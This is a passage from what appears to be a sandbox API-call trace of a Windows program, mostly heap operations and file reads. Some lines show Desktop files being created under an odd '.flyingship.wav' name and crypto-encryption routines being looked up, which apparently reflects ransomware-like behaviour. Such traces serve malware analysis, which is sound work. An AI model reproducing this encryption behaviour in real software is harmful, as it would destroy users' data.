hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.302] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0161.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa7d010 [0161.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjmnmjqzifmsie_.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0161.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0161.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0161.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0161.308] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0161.308] ReadFile (in: hFile=0x120, lpBuffer=0xa6d008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6d008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0161.311] ReadFile (in: hFile=0x120, lpBuffer=0xa6d008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6d008*, lpNumberOfBytesRead=0x87efb8*=0x4234, lpOverlapped=0x0) returned 1 [0161.311] ReadFile (in: hFile=0x120, lpBuffer=0xa6d008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6d008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0161.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14234) returned 0x9c5180 [0161.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0161.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14234) returned 0x9d93c0 [0161.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14234) returned 0x9c5180 [0161.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0161.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.315] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14234) returned 0x9c5180 [0161.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0161.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0161.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0161.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14234) returned 0x9ed600 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0161.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.318] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0161.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0161.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0161.318] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0161.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.318] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0161.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28d8 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0161.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0161.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0161.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.319] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.319] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0161.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.320] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 